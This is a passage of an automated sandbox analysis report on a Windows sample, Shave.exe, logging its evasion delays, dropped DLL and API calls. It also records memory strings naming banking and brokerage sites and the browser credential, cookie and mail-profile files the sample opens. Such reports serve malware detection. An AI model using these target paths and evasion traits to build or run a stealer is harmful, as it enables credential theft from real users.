Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 596914 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 596797 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 596677 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 596556 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 596438 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 596313 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 596188 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 596063 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 595938 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 595828 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 595719 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 595594 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 595484 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 595375 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 595266 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 595156 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 595047 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 594937 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 594828 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 594719 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 594594 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 594484 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 594375 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Window / User API: threadDelayed 8341 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Window / User API: threadDelayed 1497 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsa5D43.tmp\System.dll Jump to dropped file
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep count: 38 > 30 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -35048813740048126s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -599891s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 2076 Thread sleep count: 8341 > 30 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 2076 Thread sleep count: 1497 > 30 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -599766s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -599656s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -599547s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -599438s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -599313s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -599188s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -599063s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -598953s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -598844s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -598719s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -598609s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -598500s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -598391s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -598281s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -598172s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -598063s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -597938s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -597828s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -597719s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -597594s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -597484s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -597375s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -597266s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -597156s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -597047s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -596914s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -596797s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -596677s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -596556s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -596438s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -596313s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -596188s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -596063s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -595938s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -595828s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -595719s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -595594s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -595484s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -595375s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -595266s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -595156s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -595047s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -594937s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -594828s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -594719s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -594594s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -594484s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe TID: 5376 Thread sleep time: -594375s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Code function: 0_2_004065DA FindFirstFileW,FindClose, 0_2_004065DA
Source: C:\Users\user\Desktop\Shave.exe Code function: 0_2_004059A9 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_004059A9
Source: C:\Users\user\Desktop\Shave.exe Code function: 0_2_00402868 FindFirstFileW, 0_2_00402868
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_00402868 FindFirstFileW, 3_2_00402868
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_004065DA FindFirstFileW,FindClose, 3_2_004065DA
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_004059A9 DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 3_2_004059A9
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 600000
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 599891
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 599766
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 599656
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 599547
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 599438
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 599313
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 599188
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 599063
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 598953
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 598844
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 598719
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 598609
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 598500
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 598391
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 598281
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 598172
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 598063
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 597938
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 597828
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 597719
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 597594
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 597484
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 597375
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 597266
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 597156
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 597047
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 596914
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 596797
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 596677
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 596556
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 596438
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 596313
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 596188
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 596063
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 595938
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 595828
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 595719
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 595594
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 595484
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 595375
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 595266
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 595156
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 595047
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 594937
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 594828
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 594719
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 594594
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 594484
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 594375
Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
Source: Shave.exe, 00000003.00000002.3279604982.0000000004BCC000.00000004.00000020.00020000.00000000.sdmp, Shave.exe, 00000003.00000002.3279604982.0000000004B78000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Shave.exe, 00000003.00000002.3300398424.00000000361C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: Shave.exe, 00000003.00000002.3300398424.00000000364DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: C:\Users\user\Desktop\Shave.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\Shave.exe Code function: 0_2_6F971B63 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 0_2_6F971B63
Source: C:\Users\user\Desktop\Shave.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\Shave.exe Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\Shave.exe Process created: C:\Users\user\Desktop\Shave.exe "C:\Users\user\Desktop\Shave.exe"
Source: C:\Users\user\Desktop\Shave.exe Queries volume information: C:\Users\user\Desktop\Shave.exe VolumeInformation
Source: C:\Users\user\Desktop\Shave.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\Shave.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\Shave.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\Desktop\Shave.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\Desktop\Shave.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\Desktop\Shave.exe Code function: 0_2_0040336C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_0040336C
Source: C:\Users\user\Desktop\Shave.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 00000003.00000002.3299164468.0000000035131000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Shave.exe PID: 7044, type: MEMORYSTR
Source: Yara match File source: 00000003.00000002.3299164468.000000003526B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\Shave.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\Shave.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\Shave.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\Shave.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\Shave.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\Shave.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\Shave.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Users\user\Desktop\Shave.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\Shave.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\Desktop\Shave.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Yara match File source: 00000003.00000002.3299164468.0000000035238000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Shave.exe PID: 7044, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 00000003.00000002.3299164468.0000000035131000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Shave.exe PID: 7044, type: MEMORYSTR
Source: Yara match File source: 00000003.00000002.3299164468.000000003526B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY